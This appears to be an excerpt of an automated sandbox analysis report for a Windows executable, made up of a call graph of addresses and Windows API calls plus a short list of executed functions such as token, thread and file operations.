9a5f80 CloseHandle std::ios_base::_Ios_base_dtor 50717->50897 50720 988f58 50719->50720 50721 988f4e 50719->50721 50959 992d90 50720->50959 50988 84a5a0 38 API calls 4 library calls 50721->50988 50724 988f61 50725 989052 50724->50725 50726 988fa7 50724->50726 50989 960af0 97 API calls 50724->50989 50735 98906e 50725->50735 50969 960f20 50725->50969 50729 989039 50726->50729 50733 84abe0 50 API calls 50726->50733 50727 989194 50727->50665 50729->50665 50731 84abe0 50 API calls 50731->50735 50732 988f8c 50732->50725 50732->50726 50734 988fb9 50733->50734 50736 9891aa 50734->50736 50737 988fc1 50734->50737 50735->50727 50735->50731 50735->50736 50738 989094 50735->50738 50739 84a8a0 2 API calls 50736->50739 50741 861a20 112 API calls 50737->50741 50738->50727 50738->50735 50749 98912d SetFilePointer SetEndOfFile 50738->50749 50991 849c00 71 API calls 50738->50991 50740 9891b4 50739->50740 50743 988fe4 50741->50743 50745 989009 50743->50745 50748 988ffb 50743->50748 50744 9890bd CreateFileW 50992 95eab0 62 API calls __Getctype 50744->50992 50990 994490 151 API calls 50745->50990 50750 861a20 112 API calls 50748->50750 50749->50738 50752 989156 CloseHandle 50749->50752 50750->50745 50751 989017 50751->50729 50752->50738 50753->50630 50754->50640 50756 94960d MultiByteToWideChar 50755->50756 50757 94966a 50755->50757 50756->50757 50759 949625 50756->50759 51105 84a4f0 RtlAllocateHeap RaiseException 50757->51105 50761 949640 MultiByteToWideChar 50759->50761 51104 84a6b0 38 API calls 50759->51104 50760 949671 50760->50653 50763 949657 50761->50763 50764 949679 50761->50764 50763->50653 50765 84a8a0 2 API calls 50764->50765 50766 949683 50765->50766 50767->50659 50769 84abe0 50 API calls 50768->50769 50770 986732 50769->50770 50771 988162 50770->50771 50775 84abe0 50 API calls 50770->50775 50772 84a8a0 2 API calls 50771->50772 50773 98816c 50772->50773 50774 988193 50773->50774 50802 9880ab ___std_exception_copy 50773->50802 50776 9881e0 CloseHandle 50774->50776 50779 9881ee 50774->50779 50780 986758 50775->50780 50776->50779 50777 a15d9a _ValidateLocalCookies 5 API calls 50778 988143 50777->50778 50778->50667 50779->50667 50780->50771 50781 84abe0 50 API calls 50780->50781 50782 9868e2 50781->50782 50782->50771 50783 987de4 50782->50783 50785 84abe0 50 API calls 50782->50785 51113 9a59c0 50783->51113 50796 986943 50785->50796 50786 987e35 50787 987e3f 50786->50787 50788 987e9d CreateThread 50786->50788 50789 987e64 CreateEventW 50786->50789 50790 987f7a CloseHandle 50787->50790 50791 987f87 50787->50791 50794 987edd WaitForSingleObject GetExitCodeThread 50788->50794 50795 987ed6 50788->50795 51150 9a4a80 146 API calls 50788->51150 50792 987e7e 50789->50792 50790->50791 50793 987fa2 CloseHandle 50791->50793 50809 987faf 50791->50809 50792->50788 50793->50809 50798 987ef8 50794->50798 50799 987f2b 50794->50799 50795->50794 50796->50771 50797 949600 42 API calls 50796->50797 50803 986984 50797->50803 50798->50787 50800 987f1c CloseHandle 50798->50800 50799->50787 50801 987f3d CloseHandle 50799->50801 50800->50787 50801->50787 50802->50777 50805 a15dd9 std::_Facet_Register 2 API calls 50803->50805 50804 988158 50807 84a8a0 2 API calls 50804->50807 50806 9869f8 50805->50806 50810 84abe0 50 API calls 50806->50810 50807->50771 50808 848860 38 API calls 50808->50809 50809->50802 50809->50804 50809->50808 50813 988076 std::ios_base::_Ios_base_dtor 50809->50813 50811 986aa9 50810->50811 50811->50771 50814 8476d0 39 API calls 50811->50814 50813->50809 51134 9a5f80 CloseHandle std::ios_base::_Ios_base_dtor 50813->51134 50815 986adb 50814->50815 50815->50804 50816 95bcc0 115 API calls 50815->50816 50817 9870de 50816->50817 50818 862300 40 API calls 50817->50818 50819 9870f7 50818->50819 50819->50804 50820 98717b 50819->50820 50821 8481d0 39 API calls 50820->50821 50822 987189 50821->50822 50823 8476d0 39 API calls 50822->50823 50824 9871ae 50823->50824 51106 952130 41 API calls 3 library calls 50824->51106 50826 9871bd 51107 9529a0 39 API calls 3 library calls 50826->51107 50828 9871d3 50829 951e50 42 API calls 50828->50829 50830 9873d2 50829->50830 51108 946cd0 115 API calls 50830->51108 50832 987402 std::locale::_Setgloballocale 50833 987566 FindFirstFileW 50832->50833 50834 9875cb 50833->50834 50835 8481d0 39 API calls 50834->50835 50836 9876ac 50835->50836 50837 8476d0 39 API calls 50836->50837 50838 9876e6 50837->50838 51109 952130 41 API calls 3 library calls 50838->51109 50840 9876f8 51110 9529a0 39 API calls 3 library calls 50840->51110 50842 987711 50843 848860 38 API calls 50842->50843 50844 987781 50843->50844 50845 8481d0 39 API calls 50844->50845 50846 98795c 50845->50846 50847 8476d0 39 API calls 50846->50847 50848 987984 50847->50848 51111 952130 41 API calls 3 library calls 50848->51111 50850 987993 51112 9529a0 39 API calls 3 library calls 50850->51112 50852 9879a9 50853 848860 38 API calls 50852->50853 50854 9879d8 50853->50854 50854->50783 50856 946dba 50855->50856 50866 946e2c std::locale::_Locimp::_Locimp 50855->50866 50864 946dd5 std::locale::_Setgloballocale 50856->50864 50874 84a6b0 38 API calls 50856->50874 50857 84a8a0 2 API calls 50858 946e74 50857->50858 50860 91d900 114 API calls 50858->50860 50863 946ed4 50860->50863 50862 946e5a 50862->50679 50871 946ef6 50863->50871 50872 946eed GetLastError 50863->50872 50867 946de9 std::locale::_Locimp::_Locimp std::locale::_Setgloballocale 50864->50867 50875 a1b33f 11 API calls __Wcscoll 50864->50875 50865 946e05 50876 a1b21f 38 API calls ___std_exception_copy 50865->50876 50866->50857 50866->50862 50867->50866 50877 a1b33f 11 API calls __Wcscoll 50867->50877 50869 946e48 50878 a1b21f 38 API calls ___std_exception_copy 50869->50878 50871->50679 50872->50871 50874->50864 50875->50865 50876->50867 50877->50869 50878->50866 50879->50698 50880->50698 50898 951e50 50881->50898 50885 9a614b 50886 848860 38 API calls 50885->50886 50887 9a616f 50886->50887 50920 9fbe00 50887->50920 50889 9a617f 50890 a15d9a _ValidateLocalCookies 5 API calls 50889->50890 50891 9a619c 50890->50891 50891->50698 50892->50698 50893->50695 50894->50695 50895->50695 50896->50695 50897->50716 50899 951ea6 50898->50899 50901 951eb3 50898->50901 50900 8476d0 39 API calls 50899->50900 50919 951eae 50900->50919 50902 952023 50901->50902 50904 951ef0 PathIsUNCW 50901->50904 50905 8476d0 39 API calls 50902->50905 50903 a15d9a _ValidateLocalCookies 5 API calls 50906 952052 CreateFileW 50903->50906 50907 951f05 50904->50907 50908 951fdb 50904->50908 50905->50919 50906->50885 50937 953d50 40 API calls ___vcrt_FlsFree 50907->50937 50939 953d50 40 API calls ___vcrt_FlsFree 50908->50939 50911 952000 50911->50902 50913 952007 50911->50913 50912 951f2a 50912->50902 50914 951f35 50912->50914 50915 8476d0 39 API calls 50913->50915 50916 8476d0 39 API calls 50914->50916 50917 951f3e std::locale::_Locimp::_Locimp 50915->50917 50916->50917 50938 849b10 39 API calls std::locale::_Locimp::_Locimp 50917->50938 50919->50903 50921 9fbe48 50920->50921 50922 9fbe31 50920->50922 50940 a00110 50921->50940 50922->50889 50925 a15dd9 std::_Facet_Register 2 API calls 50926 9fbe57 50925->50926 50927 a15dd9 std::_Facet_Register 2 API calls 50926->50927 50928 9fbf08 50927->50928 50929 a15dd9 std::_Facet_Register 2 API calls 50928->50929 50930 9fbfac SetFilePointer 50929->50930 50932 9fc026 50930->50932 50931 9fc06a 50931->50889 50932->50931 50944 a03e30 RaiseException std::ios_base::_Ios_base_dtor 50932->50944 50934 9fc0cc 50936 9fc0d0 50934->50936 50945 a033d0 5 API calls _ValidateLocalCookies 50934->50945 50936->50889 50937->50912 50938->50919 50939->50911 50941 a00112 50940->50941 50941->50941 50946 a0c3b0 50941->50946 50943 9fbe4d 50943->50925 50944->50934 50945->50936 50947 a0c3d0 50946->50947 50950 a0c436 50947->50950 50951 a0c453 50947->50951 50952 a0c442 50947->50952 50954 a0c46e 50947->50954 50948 a15d9a _ValidateLocalCookies 5 API calls 50949 a0c4bf 50948->50949 50949->50943 50950->50948 50953 a15d9a _ValidateLocalCookies 5 API calls 50951->50953 50952->50950 50952->50951 50955 a0c463 50953->50955 50954->50950 50956 a0c478 50954->50956 50955->50943 50957 a15d9a _ValidateLocalCookies 5 API calls 50956->50957 50958 a0c488 50957->50958 50958->50943 50960 992eda 50959->50960 50963 992db5 50959->50963 50961 a15d9a _ValidateLocalCookies 5 API calls 50960->50961 50962 992eed 50961->50962 50962->50724 50963->50960 50964 992e51 GetDiskFreeSpaceExW 50963->50964 50964->50963 50965 992eaf 50964->50965 50965->50960 50966 992ec3 50965->50966 50967 a15d9a _ValidateLocalCookies 5 API calls 50966->50967 50968 992ed6 50967->50968 50968->50724 50970 960f51 50969->50970 50971 960f55 50970->50971 50972 960f69 PathIsUNCW 50970->50972 50971->50735 50993 960ba0 50972->50993 50974 961131 50975 84a8a0 2 API calls 50974->50975 50976 96113b CreateFileW 50975->50976 50977 9611aa 50976->50977 50978 96119c GetFileSize 50976->50978 50979 9611c4 CloseHandle 50977->50979 50980 9611d2 50977->50980 50978->50977 50979->50980 50980->50735 50981 960f9e 50981->50974 50982 961056 50981->50982 50983 861a20 112 API calls 50981->50983 50987 861a20 112 API calls 50981->50987 51060 95eab0 62 API calls __Getctype 50981->51060 50982->50735 50984 961024 CreateDirectoryW 50983->50984 50984->50981 50985 961038 GetLastError 50984->50985 50985->50981 50987->50981 50988->50720 50989->50732 50990->50751 50991->50744 50992->50738 50994 84abe0 50 API calls 50993->50994 50995 960bd9 50994->50995 50996 960efe 50995->50996 51000 84abe0 50 API calls 50995->51000 50997 84a8a0 2 API calls 50996->50997 50998 960f08 50997->50998 50999 84a8a0 2 API calls 50998->50999 51003 960f12 50999->51003 51001 960bfa 51000->51001 51001->50996 51002 960c02 51001->51002 51061 960af0 97 API calls 51002->51061 51005 960f55 51003->51005 51006 960f69 PathIsUNCW 51003->51006 51005->50981 51008 960ba0 122 API calls 51006->51008 51007 960c1a 51009 960c25 51007->51009 51010 960d29 51007->51010 51057 960f9e 51008->51057 51011 960cba 51009->51011 51026 960c4b 51009->51026 51012 862300 40 API calls 51010->51012 51014 8556e0 97 API calls 51011->51014 51016 960d32 PathIsUNCW 51012->51016 51013 961131 51015 84a8a0 2 API calls 51013->51015 51017 960cd4 51014->51017 51018 96113b CreateFileW 51015->51018 51019 960d4c 51016->51019 51021 862300 40 API calls 51017->51021 51022 9611aa 51018->51022 51023 96119c GetFileSize 51018->51023 51024 8556e0 97 API calls 51019->51024 51020 961056 51020->50981 51025 960ce7 51021->51025 51029 9611c4 CloseHandle 51022->51029 51030 9611d2 51022->51030 51023->51022 51027 960d78 51024->51027 51032 861a20 112 API calls 51025->51032 51028 8556e0 97 API calls 51026->51028 51031 861a20 112 API calls 51027->51031 51033 960c65 51028->51033 51029->51030 51030->50981 51035 960d8a 51031->51035 51036 960cb8 51032->51036 51037 862300 40 API calls 51033->51037 51034 861a20 112 API calls 51034->51057 51062 95be30 40 API calls 3 library calls 51035->51062 51036->51016 51038 960c78 51037->51038 51040 861a20 112 API calls 51038->51040 51040->51036 51041 960db6 51043 960dbf 51041->51043 51044 960e08 51041->51044 51042 861a20 112 API calls 51046 961024 CreateDirectoryW 51042->51046 51063 941cc0 51043->51063 51045 941cc0 52 API calls 51044->51045 51049 960e2d 51045->51049 51050 961038 GetLastError 51046->51050 51046->51057 51048 960dcb 51083 963570 51048->51083 51052 963570 107 API calls 51049->51052 51050->51057 51053 960e40 51052->51053 51095 95eab0 62 API calls __Getctype 51053->51095 51056 960dde 51056->50981 51057->51013 51057->51020 51057->51034 51057->51042 51097 95eab0 62 API calls __Getctype 51057->51097 51058 960e6d 51058->50998 51058->51056 51096 95eab0 62 API calls __Getctype 51058->51096 51060->50981 51061->51007 51062->51041 51064 84abe0 50 API calls 51063->51064 51068 941cfe 51064->51068 51065 941e70 51066 84a8a0 2 API calls 51065->51066 51067 941e7a 51066->51067 51069 84a8a0 2 API calls 51067->51069 51068->51065 51072 941e66 51068->51072 51074 941d77 51068->51074 51082 941e21 51068->51082 51075 941e84 ___std_exception_copy 51069->51075 51070 a15d9a _ValidateLocalCookies 5 API calls 51071 941e60 51070->51071 51071->51048 51073 84a8a0 2 API calls 51072->51073 51073->51065 51076 941d85 51074->51076 51098 941ee0 RtlAllocateHeap RaiseException ___std_exception_copy 51074->51098 51075->51048 51099 a1f837 38 API calls 3 library calls 51076->51099 51079 941d9d 51079->51067 51081 941dd1 51079->51081 51100 84a6b0 38 API calls 51079->51100 51081->51067 51081->51081 51081->51082 51082->51070 51089 9635b4 51083->51089 51084 963694 51084->51056 51085 9636d3 51103 95eab0 62 API calls __Getctype 51085->51103 51087 96365f 51087->51085 51088 963666 51087->51088 51090 8556e0 97 API calls 51088->51090 51089->51084 51089->51085 51089->51087 51093 8556e0 97 API calls 51089->51093 51101 95eab0 62 API calls __Getctype 51089->51101 51091 963681 51090->51091 51102 95eab0 62 API calls __Getctype 51091->51102 51093->51089 51095->51058 51096->51058 51097->51057 51098->51076 51099->51079 51100->51081 51101->51089 51102->51084 51103->51084 51104->50761 51105->50760 51106->50826 51107->50828 51108->50832 51109->50840 51110->50842 51111->50850 51112->50852 51114 9a59f8 CreateEventW 51113->51114 51115 9a5a26 CreateThread 51113->51115 51117 9a5a0d 51114->51117 51116 9a5b3d WaitForSingleObject GetExitCodeThread 51115->51116 51125 9a5a62 51115->51125 51147 9a5d70 51115->51147 51118 9a5b6a CloseHandle 51116->51118 51119 9a5b78 51116->51119 51117->51115 51118->51119 51119->50786 51120 9a5b8e 51122 84a8a0 2 API calls 51120->51122 51121 9a5b20 51121->51116 51123 9a5b98 51122->51123 51124 9a5bd1 WaitForSingleObject 51123->51124 51127 9a5bda 51123->51127 51124->51127 51125->51120 51125->51121 51126 84a8a0 2 API calls 51128 9a5d66 51126->51128 51130 9a5cfe 51127->51130 51133 9a5c28 51127->51133 51135 985260 RtlAllocateHeap RaiseException 51127->51135 51136 9a5ba0 51128->51136 51130->50786 51132 9a5d79 51132->50786 51133->51126 51133->51130 51134->50813 51135->51127 51137 9a5bd1 WaitForSingleObject 51136->51137 51139 9a5bda 51136->51139 51137->51139 51138 84a8a0 2 API calls 51140 9a5d66 51138->51140 51144 9a5c28 51139->51144 51145 9a5cfe 51139->51145 51146 985260 RtlAllocateHeap RaiseException 51139->51146 51142 9a5ba0 2 API calls 51140->51142 51143 9a5d79 51142->51143 51143->51132 51144->51138 51144->51145 51145->51132 51146->51139 51148 9a5ba0 3 API calls 51147->51148 51149 9a5d79 51148->51149 51151 89feb0 51152 89fee6 51151->51152 51153 a15dd9 std::_Facet_Register 2 API calls 51152->51153 51158 89ffb2 51152->51158 51154 89ff42 51153->51154 51159 89b6b0 51154->51159 51156 89ff93 51164 88e0a0 51156->51164 51171 89bcd0 51159->51171 51161 89b726 51162 88e0a0 60 API calls 51161->51162 51163 89b76f 51162->51163 51163->51156 51165 88e11f 51164->51165 51166 88e0f0 51164->51166 51322 88dd80 51165->51322 51329 88df60 51 API calls 51166->51329 51169 88e0fb 51169->51158 51170 88e13b 51170->51158 51172 89bd19 51171->51172 51175 8a80f0 51172->51175 51174 89bd85 51174->51161 51176 8a8140 51175->51176 51177 8a8171 51175->51177 51194 88e1e0 51176->51194 51182 8a7fc0 51177->51182 51180 8a814d 51180->51174 51181 8a8183 51181->51174 51210 84fac0 51182->51210 51184 8a7ffe 51216 8a7f40 51184->51216 51186 8a8009 51187 8a804d 51186->51187 51188 8a8065 51186->51188 51191 88e1e0 53 API calls 51187->51191 51189 8a809b 51188->51189 51190 8a8089 InterlockedPushEntrySList 51188->51190 51192 88e1e0 53 API calls 51189->51192 51190->51189 51193 8a805d 51191->51193 51192->51193 51193->51181 51195 88e244 51194->51195 51196 88e275 51195->51196 51197 851250 51 API calls 51195->51197 51196->51180 51198 88e2c2 51197->51198 51199 84fac0 38 API calls 51198->51199 51200 88e30e 51199->51200 51321 88e160 53 API calls 51200->51321 51202 88e319 51203 88e35d 51202->51203 51204 88e375 51202->51204 51207 88e1e0 52 API calls 51203->51207 51205 88e399 InterlockedPushEntrySList 51204->51205 51206 88e3ab 51204->51206 51205->51206 51208 88e1e0 52 API calls 51206->51208 51209 88e36d 51207->51209 51208->51209 51209->51180 51211 84fafe 51210->51211 51212 84faea 51210->51212 51213 84fb0b 51211->51213 51232 a1f8bb 51211->51232 51212->51184 51213->51184 51217 8a7f8a 51216->51217 51218 8a7f94 51217->51218 51247 851250 51217->51247 51218->51186 51220 8a7fbf 51221 84fac0 38 API calls 51220->51221 51222 8a7ffe 51221->51222 51223 8a7f40 53 API calls 51222->51223 51224 8a8009 51223->51224 51225 8a804d 51224->51225 51226 8a8065 51224->51226 51229 88e1e0 53 API calls 51225->51229 51227 8a809b 51226->51227 51228 8a8089 InterlockedPushEntrySList 51226->51228 51230 88e1e0 53 API calls 51227->51230 51228->51227 51231 8a805d 51229->51231 51230->51231 51231->51186 51243 a2f4be EnterCriticalSection std::locale::_Setgloballocale 51232->51243 51234 a1f8c0 51235 a1f8cb 51234->51235 51244 a2f503 38 API calls 6 library calls 51234->51244 51237 a1f8d5 IsProcessorFeaturePresent 51235->51237 51242 a1f8f4 51235->51242 51239 a1f8e1 51237->51239 51245 a1b023 8 API calls 2 library calls 51239->51245 51241 a1f8fe 51246 a2165b 15 API calls std::locale::_Setgloballocale 51242->51246 51243->51234 51244->51235 51245->51242 51246->51241 51252 851262 Concurrency::cancel_current_task 51247->51252 51248 851296 51249 8512bc 51248->51249 51307 84fb40 51 API calls 51248->51307 51251 8512e2 51249->51251 51308 84fc90 51 API calls 51249->51308 51256 851308 51251->51256 51309 84fcf0 51 API calls 51251->51309 51252->51248 51253 a17b2a Concurrency::cancel_current_task RaiseException 51252->51253 51253->51248 51254 8512ad 51258 a17b2a Concurrency::cancel_current_task RaiseException 51254->51258 51257 85132e 51256->51257 51310 84fd50 51 API calls 51256->51310 51266 851354 51257->51266 51311 84fdb0 51 API calls 51257->51311 51258->51249 51259 8512d3 51262 a17b2a Concurrency::cancel_current_task RaiseException 51259->51262 51262->51251 51263 8512f9 51268 a17b2a Concurrency::cancel_current_task RaiseException 51263->51268 51264 85131f 51270 a17b2a Concurrency::cancel_current_task RaiseException 51264->51270 51267 85137a 51266->51267 51312 84fe10 51 API calls 51266->51312 51269 8513a0 51267->51269 51313 84fe70 51 API calls 51267->51313 51268->51256 51274 8513c6 51269->51274 51314 84fed0 51 API calls 51269->51314 51270->51257 51271 851345 51275 a17b2a Concurrency::cancel_current_task RaiseException 51271->51275 51279 8513ec 51274->51279 51315 84ff30 51 API calls 51274->51315 51275->51266 51276 85136b 51280 a17b2a Concurrency::cancel_current_task RaiseException 51276->51280 51277 851391 51281 a17b2a Concurrency::cancel_current_task RaiseException 51277->51281 51284 851412 51279->51284 51316 84ff90 51 API calls 51279->51316 51280->51267 51281->51269 51282 8513b7 51287 a17b2a Concurrency::cancel_current_task RaiseException 51282->51287 51286 851438 51284->51286 51317 84fff0 51 API calls 51284->51317 51291 85145e 51286->51291 51318 850050 51 API calls 51286->51318 51287->51274 51288 8513dd 51292 a17b2a Concurrency::cancel_current_task RaiseException 51288->51292 51289 851403 51293 a17b2a Concurrency::cancel_current_task RaiseException 51289->51293 51296 851484 51291->51296 51319 8500b0 51 API calls 51291->51319 51292->51279 51293->51284 51294 851429 51298 a17b2a Concurrency::cancel_current_task RaiseException 51294->51298 51320 850ec0 51 API calls __Getcoll 51296->51320 51298->51286 51299 85144f 51303 a17b2a Concurrency::cancel_current_task RaiseException 51299->51303 51301 851475 51304 a17b2a Concurrency::cancel_current_task RaiseException 51301->51304 51302 851496 51305 a17b2a Concurrency::cancel_current_task RaiseException 51302->51305 51303->51291 51304->51296 51306 8514a5 51305->51306 51307->51254 51308->51259 51309->51263 51310->51264 51311->51271 51312->51276 51313->51277 51314->51282 51315->51288 51316->51289 51317->51294 51318->51299 51319->51301 51320->51302 51321->51202 51323 84fac0 38 API calls 51322->51323 51324 88ddbe 51323->51324 51330 84f980 51324->51330 51326 88ddc9 51327 88de0d 51326->51327 51328 88de4b InterlockedPushEntrySList 51326->51328 51327->51170 51328->51327 51329->51169 51336 84f620 51330->51336 51333 84f9d4 51333->51326 51334 851250 51 API calls 51335 84f9ff 51334->51335 51335->51326 51337 84f688 51336->51337 51338 84f679 51336->51338 51339 84f691 LoadLibraryW GetProcAddress 51337->51339 51340 84f6b8 51337->51340 51343 a15d9a _ValidateLocalCookies 5 API calls 51338->51343 51339->51340 51341 84f71a RoGetActivationFactory 51340->51341 51347 84f6bf 51340->51347 51342 84f72c LoadLibraryW GetProcAddress 51341->51342 51341->51347 51344 84f745 51342->51344 51345 84f74f 51342->51345 51346 84f96b 51343->51346 51344->51338 51345->51347 51346->51333 51346->51334 51347->51338 51348 8481d0 39 API calls 51347->51348 51349 84f7a1 51348->51349 51350 84f906 51349->51350 51358 84f7f5 51349->51358 51350->51338 51360 848820 38 API calls 2 library calls 51350->51360 51351 84f5b0 39 API calls 51351->51358 51354 84f81f LoadLibraryW 51354->51358 51355 84f86e GetProcAddress 51356 84f8bd FreeLibrary 51355->51356 51355->51358 51356->51349 51357 84f8d3 51357->51350 51358->51349 51358->51351 51358->51355 51358->51356 51358->51357 51359 84ada0 39 API calls 51358->51359 51359->51354 51360->51338 51361 89de70 51362 89dea6 51361->51362 51363 a15dd9 std::_Facet_Register 2 API calls 51362->51363 51366 89df53 51362->51366 51364 89df02 51363->51364 51367 89d9e0 51364->51367 51368 89da3e 51367->51368 51373 8a70d0 51368->51373 51370 89da78 51380 8a74b0 51370->51380 51372 89daa9 51372->51366 51374 8a714f 51373->51374 51375 8a7120 51373->51375 51387 8a6d50 51374->51387 51394 8a6f90 51 API calls 51375->51394 51378 8a712b 51378->51370 51379 8a716b 51379->51370 51381 8a752f 51380->51381 51382 8a7500 51380->51382 51395 8a7190 51381->51395 51404 8a7370 51382->51404 51385 8a750b 51385->51372 51386 8a754b 51386->51372 51388 84fac0 38 API calls 51387->51388 51389 8a6d8e 51388->51389 51390 84f980 59 API calls 51389->51390 51391 8a6d99 51390->51391 51392 8a6e1b InterlockedPushEntrySList 51391->51392 51393 8a6ddd 51391->51393 51392->51393 51393->51379 51394->51378 51396 84fac0 38 API calls 51395->51396 51397 8a71ce 51396->51397 51398 84f980 59 API calls 51397->51398 51399 8a71d9 51398->51399 51400 8a725b InterlockedPushEntrySList 51399->51400 51401 8a726d 51399->51401 51402 8a721d 51399->51402 51400->51401 51403 8a7370 51 API calls 51401->51403 51402->51386 51403->51402 51405 8a73c3 51404->51405 51406 8a73d6 51405->51406 51407 851250 51 API calls 51405->51407 51406->51385 51408 8a744c 51407->51408 51409 8a7370 51 API calls 51408->51409 51410 8a7487 51409->51410 51410->51385 51411 89c1b0 51412 89c1e6 51411->51412 51413 a15dd9 std::_Facet_Register 2 API calls 51412->51413 51416 89c293 51412->51416 51414 89c242 51413->51414 51417 89c650 51414->51417 51418 89c694 51417->51418 51421 8a8420 51418->51421 51420 89c765 51420->51416 51424 8a8360 51421->51424 51423 8a8486 51423->51420 51425 8a83b0 51424->51425 51426 8a83e1 51424->51426 51427 88e1e0 53 API calls 51425->51427 51431 8a8230 51426->51431 51429 8a83bd 51427->51429 51429->51423 51430 8a83f3 51430->51423 51432 84fac0 38 API calls 51431->51432 51433 8a826e 51432->51433 51443 8a81b0 51433->51443 51435 8a8279 51436 8a82bd 51435->51436 51437 8a82d5 51435->51437 51440 88e1e0 53 API calls 51436->51440 51438 8a830b 51437->51438 51439 8a82f9 InterlockedPushEntrySList 51437->51439 51441 88e1e0 53 API calls 51438->51441 51439->51438 51442 8a82cd 51440->51442 51441->51442 51442->51430 51444 8a81fa 51443->51444 51445 8a8204 51444->51445 51446 851250 51 API calls 51444->51446 51445->51435 51447 8a822f 51446->51447 51448 84fac0 38 API calls 51447->51448 51449 8a826e 51448->51449 51450 8a81b0 53 API calls 51449->51450 51451 8a8279 51450->51451 51452 8a82bd 51451->51452 51453 8a82d5 51451->51453 51456 88e1e0 53 API calls 51452->51456 51454 8a830b 51453->51454 51455 8a82f9 InterlockedPushEntrySList 51453->51455 51457 88e1e0 53 API calls 51454->51457 51455->51454 51458 8a82cd 51456->51458 51457->51458 51458->51435 51459 9a00e0 51460 9a010f 51459->51460 51461 9a0125 51459->51461 51462 84abe0 50 API calls 51461->51462 51463 9a012a 51462->51463 51464 9a0234 51463->51464 51465 9a0134 51463->51465 51466 84a8a0 2 API calls 51464->51466 51487 849c00 71 API calls 51465->51487 51467 9a023e 51466->51467 51469 84abe0 50 API calls 51467->51469 51482 9a0275 ___crtLCMapStringW 51469->51482 51470 9a0429 51471 84a8a0 2 API calls 51470->51471 51472 9a0433 51471->51472 51473 84a8a0 2 API calls 51472->51473 51474 9a043d 51473->51474 51475 84a6b0 38 API calls 51475->51482 51476 9a01c8 51477 9a0159 51477->51476 51478 9a01cc 51477->51478 51488 9a0440 93 API calls 6 library calls 51478->51488 51480 9a01d7 51480->51476 51481 84abe0 50 API calls 51481->51482 51482->51470 51482->51472 51482->51475 51482->51481 51484 9a03c2 51482->51484 51485 9a03d2 51482->51485 51489 855250 51482->51489 51484->51485 51486 862300 40 API calls 51484->51486 51486->51485 51487->51477 51488->51480 51490 8552d1 51489->51490 51493 855278 51489->51493 51491 84a8a0 2 API calls 51490->51491 51492 8552db 51491->51492 51493->51482 51494 9bd3c0 51504 9bd540 51494->51504 51496 9bd4a2 std::ios_base::_Ios_base_dtor 51497 9bd46f 51497->51496 51498 a1b22f std::_Throw_Cpp_error 38 API calls 51497->51498 51499 9bd4dc 51498->51499 51523 9beb00 38 API calls 2 library calls 51499->51523 51501 9bd518 51502 848860 38 API calls 51501->51502 51503 9bd527 51502->51503 51505 8476d0 39 API calls 51504->51505 51506 9bd59f 51505->51506 51524 8480a0 39 API calls std::locale::_Locimp::_Locimp 51506->51524 51508 848860 38 API calls 51510 9bea68 51508->51510 51509 9bd5b5 51511 9bea3b std::ios_base::_Ios_base_dtor 51509->51511 51513 a1b22f std::_Throw_Cpp_error 38 API calls 51509->51513 51512 a15d9a _ValidateLocalCookies 5 API calls 51510->51512 51511->51508 51514 9bea81 51512->51514 51515 9bea8d 51513->51515 51514->51497 51525 848100 39 API calls 51515->51525 51517 9bea92 51526 8487b0 39 API calls std::_Throw_Cpp_error 51517->51526 51519 9bea97 51519->51511 51520 9beaa3 51519->51520 51521 848860 38 API calls 51520->51521 51522 9beae5 51521->51522 51522->51497 51523->51501 51524->51509 51525->51517 51526->51519 51527 85969b 51528 8596a6 CallWindowProcW 51527->51528 51529 8596bc GetWindowLongW CallWindowProcW 51527->51529 51532 85970b 51528->51532 51530 8596f0 GetWindowLongW 51529->51530 51529->51532 51531 8596fd SetWindowLongW 51530->51531 51530->51532 51531->51532

                                                                                                                        Executed Functions

                                                                                                                        Function 0097A850 Relevance: 29.3, APIs: 11, Strings: 5, Instructions: 1264synchronizationthreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0084ABE0: GetProcessHeap.KERNEL32 ref: 0084AC35
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084AC67
                                                                                                                          • Part of subcall function 0084ABE0: __Init_thread_footer.LIBCMT ref: 0084ACF2
                                                                                                                        • GetTickCount.KERNEL32 ref: 0097A8D4
                                                                                                                        • __Xtime_get_ticks.LIBCPMT ref: 0097A8DC
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0097A926
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 0097AB11
                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,C7BA013E), ref: 0097AD08
                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 0097AD0F
                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?), ref: 0097AD3E
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0097AD53
                                                                                                                          • Part of subcall function 0084A8A0: RtlAllocateHeap.NTDLL(?,00000000,?,C7BA013E,00000000,00A3DE90,000000FF,?,?,00B277EC,?,009A5D66,8000000B,C7BA013E), ref: 0084A8EA
                                                                                                                          • Part of subcall function 0084A190: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,0084A308,-00000010,?,00000000), ref: 0084A1B3
                                                                                                                          • Part of subcall function 00965C40: __Init_thread_footer.LIBCMT ref: 00965CB6
                                                                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0097B515
                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,0097C020,?,00000000,?), ref: 0097B550
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,?), ref: 0097B583
                                                                                                                          • Part of subcall function 0097E460: GetCurrentProcess.KERNEL32(?,C7BA013E), ref: 0097E4C9
                                                                                                                          • Part of subcall function 0097E460: IsWow64Process.KERNEL32(00000000), ref: 0097E4D0
                                                                                                                          • Part of subcall function 0097E460: _wcsrchr.LIBVCRUNTIME ref: 0097E551
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
